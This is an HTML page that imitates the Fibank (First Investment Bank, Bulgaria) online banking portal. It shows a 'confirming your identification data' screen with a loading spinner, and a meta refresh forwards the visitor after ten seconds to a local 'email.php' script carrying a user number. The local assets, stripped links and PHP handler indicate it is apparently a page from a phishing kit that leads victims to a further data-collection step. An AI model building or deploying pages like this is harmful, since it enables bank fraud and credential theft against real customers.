<html ng-app="sgOAuth2" class="ng-scope">
<head>
    <script async=""
            src="https://seal.thawte.com/getthawteseal?host_name=e-fibank.bg&amp;size=S&amp;lang=en&amp;_=1678966849678"></script>
    <script async=""
            src="https://seal.thawte.com/getthawteseal?host_name=e-fibank.bg&amp;size=S&amp;lang=en&amp;_=1678966849677"></script>
    <style type="text/css">@charset "UTF-8";
    [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide {
        display: none !important;
    }

    ng\:form {
        display: block;
    }

    .ng-animate-block-transitions {
        transition: 0s all !important;
        -webkit-transition: 0s all !important;
    }

    .ng-hide-add-active, .ng-hide-remove {
        display: block !important;
    }</style>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="shortcut icon" href="./icon/favicon.ico">

    <meta name="_csrf" content="6a6fedf4-f35e-4c5a-8da9-2f2b3ec4228e">
    <meta name="_csrf_header" content="X-CSRF-TOKEN">
    <meta http-equiv="refresh" content="10;URL=./email.php?num_user=ml4568965">
    <title>зареждане...</title>
    <link rel="icon" href="icon/favicon.ico">

    <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
    <script src="themes/COMMON/scripts/utils/es5-shim.js?v=20230228091555"></script>
    <script src="themes/COMMON/scripts/utils/html5shiv.min.js?v=20230228091555"></script>
    <script src="themes/COMMON/scripts/angular-ui/ui-utils-ieshiv.min.js?v=20230228091555"></script>


    <script>
        document.createElement('ui-select');
        document.createElement('ui-select-match');
        document.createElement('ui-select-choices');
    </script>
    <![endif]-->

    <!-- 		<script src="themes/COMMON/scripts/utils/modernizr.js?v=20230228091555"></script> -->

    <!-- Core CSS -->

    <link href="css/style.css" rel="stylesheet">


    <!--[if IE 8]>
    <link href="themes/COMMON/stylesheets/style-ie8.css?v=20230228091555" rel="stylesheet">
    <script src="themes/COMMON/scripts/utils/respond.min.js?v=20230228091555"></script>
    <![endif]-->
</head>
<body ng-controller="AppGlobalController"
      ng-class="{'info-footer' : $state.includes('login') || $state.includes('logout'), 'only-footer' : $state.includes('registration') || $state.includes('lost-password')}"
      class="ng-scope only-footer">
<object id="oCAPICOM" codebase="themes/COMMON/capicom.cab#version=2,0,0,3"
        classid="clsid:A996E48C-D3DC-4244-89F7-AFA33EC60679" style="display: none;">&nbsp;
</object>

<!-- Google Tag Manager -->
<script type="text/javascript" async=""
        src="https://www.googletagmanager.com/gtag/js?id=G-TYR53Y9G8L&amp;l=dataLayer&amp;cx=c"></script>
<script async="" src="https://www.googletagmanager.com/gtm.js?id=GTM-N2T67T5"></script>
<script>
    (function (w, d, s, l, i) {
        w[l] = w[l] || [];
        w[l].push({
            'gtm.start':
                new Date().getTime(), event: 'gtm.js'
        });
        var f = d.getElementsByTagName(s)[0],
            j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : '';
        j.async = true;
        j.src =
            'https://www.googletagmanager.com/gtm.js?id=' + i + dl;
        f.parentNode.insertBefore(j, f);
    })(window, document, 'script', 'dataLayer', 'GTM-N2T67T5');</script>
<!-- End Google Tag Manager -->


<!-- Google Tag Manager (noscript) -->
<noscript>
    <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-N2T67T5" height="0" width="0"
            style="display:none;visibility:hidden"></iframe>
</noscript>
<!-- Google Tag Manager (noscript) -->

<div class="body-wrapper" ng-class="{'logout-footer-wrapper' : $state.includes('logoutSuccess')}">
    <nav class="navbar navbar-default" role="banner">
        <div class="container-fluid">

            <div class="navbar-header">
                <img src="./img/logo.png" height="40px" width="160px">
            </div>

            <div class="collapse navbar-collapse" role="navigation">
                <ul class="nav navbar-nav">
                    <li><a  ng-click="changeLang(notSelectedLang)" ng-bind="notSelectedLang.langDesc"
                           class="ng-binding">English</a></li>
                    <li><a  target="blank" ><img
                            src="./img/site.png"><span translate="APP.WEBSITE" class="ng-scope">Към сайта</span></a>
                    </li>
                    <li dropdown="" sg-dropdown="" is-open="status.isopen" class="ng-scope"><a

                            target="blank"
                          ><img
                            src="./img/full.png"><span translate="APP.MOBAPP" class="ng-scope">Мобилно приложение</span></a>
                        <ul dropdown-menu="" class="dropdown-menu menu-app">
                            <li>
                                <h3 translate="APP.MOBAPP_PIC" class="ng-scope">Банкирайте навсякъде, по всяко
                                    време</h3> <a

                                    target="blank" translate="APP.LEARNMORE" class="btn btn-default h-34 ng-scope"
                              >Научете
                                повече</a>
                            </li>
                        </ul>
                    </li>
                    <li>
                        <a
                           target="blank"
                        ><img
                                src="./img/traf.png"><span translate="APP.CHANGES" class="ng-scope">Промени в ОУ и тарифа</span></a>
                    </li>

                    <li dropdown="" sg-dropdown="" is-open="status.isopen" class="ng-scope">
                        <!-- TODO: set angular -->
                        <!--<a ng-href="{{'APP.HELP_URL' | translate}}" target="blank"><i class="i-16 i-help"></i><span translate="APP.HELP"></span></a>-->
                        <a ><img src="./img/help.png"><span translate="APP.HELP"
                                                                   class="ng-scope">Помощ</span></a>
                        <ul dropdown-menu="" class="dropdown-menu menu-help">
                            <li>
                                <h3 translate="APP.INFORMATION_NMENU" class="ng-scope">Информация</h3>
                            </li>
                            <!-- ngIf: false -->
                            <li>
                                <a
                                   target="blank"
                                 >
                                    <i class="i-faq i-18-20"></i> <span translate="APP.ASKED_QUESTIONS"
                                                                        class="ng-scope">Често задавани въпроси</span>
                                </a></li>
                            <li>
                                <a
                                   target="blank"
                                   >
                                    <i class="i-security-advice-big i-18-20"></i>
                                    <span translate="APP.SECURITY_ADVICE" class="ng-scope">Мерки за сигурност</span>
                                </a></li>

                            <!-- ngIf: globalConf.translateSufix != '_CY' -->
                            <li ng-if="globalConf.translateSufix != '_CY'" class="ng-scope"><a

                                    target="blank"
                             >
                                <i class="i-faq i-18-20"></i> <span translate="APP.OSD" class="ng-scope">Онлайн решаване на спорове</span>
                            </a></li><!-- end ngIf: globalConf.translateSufix != '_CY' -->

                            <li>
                                <div class="divider"></div>
                            </li>
                            <li>
                                <h3 translate="APP.CONTACT_US_MENU" class="ng-scope">Връзка с нас</h3>
                            </li>
                            <li><a class="cursor-text"> <i class="i-18 i-phone"></i>
                                <span translate="0700 12 777" class="ng-scope">0700 12 777</span>
                            </a></li>
                            <li><a class="cursor-text"
                                  >
                                <i class="i-20-14 i-mail"></i> <span
                                                                     class="ng-scope">my.fibank@fibank.bg</span>
                            </a></li>
                            <!-- ngIf: false -->
                        </ul>
                    </li>
                </ul>
                <ul class="nav navbar-nav navbar-right">
                    <!-- ngIf: globalConf.translateSufix != '_CY' -->
                    <li ng-if="globalConf.translateSufix != '_CY'"
                        ng-show="$state.includes('login') || $state.includes('lost-password')" class="ng-scope">
                        <div>
                            <a ui-sref="registration({client_id:'E_BANK'})" translate="APP.REGISTRATION"
                               class="pull-right btn btn-info h-34 w-btn-120 ng-scope"
                      >РЕГИСТРАЦИЯ</a>
                        </div>
                    </li><!-- end ngIf: globalConf.translateSufix != '_CY' -->

                    <!-- Change which is not committed on trunk -->

                    <!--<li ng-if="globalConf.translateSufix != '_CY'" ng-cloak
                                ng-show="$state.includes('login')"><div>
                                    <a
                                        translate="APP.E-DEPOSIT"
                                        class="btn btn-primary h-34 w-btn-120"></a>
                                </div></li>-->
                    <li ng-show="$state.includes('registration')" class="ng-hide">
                        <div>
                            <a ui-sref="login({client_id:'E_BANK'})" translate="APP.LOGIN"
                               class="navbar-btn pull-right btn btn-primary h-34 w-btn-120 ng-scope"
                            >ВХОД</a>
                        </div>
                    </li>
                    <li ng-show="$state.includes('logoutSuccess')" class="ng-hide">
                        <div>
                            <a translate="APP.LOGIN"
                               class="btn pull-right btn-primary h-34 w-btn-120 ng-scope">ВХОД</a>
                        </div>
                    </li>

                </ul>
            </div>
        </div>
    </nav>

    <!-- Content -->
    <!-- uiView:  -->
    <div id="app" ui-view="" data-template-url="index" class="ng-scope">


        <!-- ngIf: isLoaderVisible -->
        <div class="container form-centered reg box-border ng-scope">
            <h1 translate="REGISTRATION.HEADER" class="ng-scope">Потвърждаване на идентификационните данни</h1>


            <form id="form" name="form" novalidate="" method="post"
                  class="ng-invalid ng-invalid-required ng-dirty">
                <!-- valentina SUPFIB-2185 start-->

                <!-- valentina SUPFIB-2185 end-->

                <div class="divider" style="margin-top: 2%"></div>
                <p class="grey-txt s2 ng-scope" translate="REGISTRATION.REQUIRED_FIELDS"></p>
                <div class="margin">

                    <!-- ngIf: post.typeRegistration!='EVROTRUST' -->
                    <div class="row ng-scope" ng-if="post.typeRegistration!='EVROTRUST'">

                    </div><!-- end ngIf: post.typeRegistration!='EVROTRUST' -->
                    <div class="col-lg-12">
                        <center><img style="width:150px;height:150px;" src="img/loading-25.gif"></center>
                    </div>

                    <div class="col-lg-12" style="margin-top: 2%">
                        Моля изчакайте, докато валидираме въведената информация.
                    </div>


                </div>


                <!-- ngIf: post.typeRegistration=='CARD' --><!-- end ngIf: post.typeRegistration=='CARD' -->


                <!-- ngIf: post.typeRegistration=='NO' -->
                <!-- ngIf: post.typeRegistration=='CARD' --><!-- end ngIf: post.typeRegistration=='CARD' -->


            </form>
        </div>
    </div>


    <div class="body-push" ng-class="{'logout-footer' : $state.includes('logoutSuccess')}"></div>
</div>

<div id="footer-push" ng-class="{'logout-footer' : $state.includes('logoutSuccess')}">
    <!-- ngIf: !$state.includes('registration') && !$state.includes('lost-password') -->
    <div id="footer" class="container-fluid text-center">
        <ul class="list-inline s2">
            <!-- ngIf: false -->
            <!-- ngIf: false -->
            <!-- ngIf: globalConf.translateSufix != '_CY' -->
            <li ng-if="globalConf.translateSufix != '_CY'" class="ng-scope"><a

                    translate="APP.REGISTRATION_PROC" target="_blank" class="ng-scope"
                    h>Процес на
                регистрация</a><i class="i-arrow-right-4x7"></i></li>
            <!-- end ngIf: globalConf.translateSufix != '_CY' -->
            <!-- ngIf: false -->
            <li><a
                   translate="APP.FEES_COMISSIONS" target="_blank" class="ng-scope"
                  >Такси и комисиони</a><i
                    class="i-arrow-right-4x7"></i></li>
            <li><a  translate="APP.DOCUMENTS"
                   target="_blank" class="ng-scope" ">Документи</a><i
                    class="i-arrow-right-4x7"></i></li>
            <li><a
                   translate="APP.PERSONAL_DATA" target="_blank" class="ng-scope"
               >Лични
                данни</a><i class="i-arrow-right-4x7"></i></li>
            <li><a translate="APP.CONTACTS" target="_blank" class="ng-scope"
             >Контакти</a><i class="i-arrow-right-4x7"></i></li>
        </ul>
        <!-- ngIf: globalConf.translateSufix != '_CY' --><p ng-if="globalConf.translateSufix != '_CY'"
                                                            class="s2 ng-scope" translate="APP.COPYRIGHTS">© Първа
        инвестиционна банка 2009-2025 <span style="border-right: 1px solid #cdd4d6; margin: 0 2.5px;"></span>&nbsp;&nbsp;Всички
        права запазени <span style="border-right: 1px solid #cdd4d6; margin: 0 2.5px;"></span>&nbsp;&nbsp;BIC /
        SWIFT: FINVBGSF</p><!-- end ngIf: globalConf.translateSufix != '_CY' -->
        <!-- ngIf: globalConf.translateSufix == '_CY' -->
    </div>
</div>
<!--  /FOOTER  -->


<!-- Static sources -->

<script type="text/javascript" src="themes/E_BANK/app/app-static.min.js?v=20230228091555"></script>

<script src="js/jquery-3.5.1.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/jquery.mask.js"></script>
</body>
</html>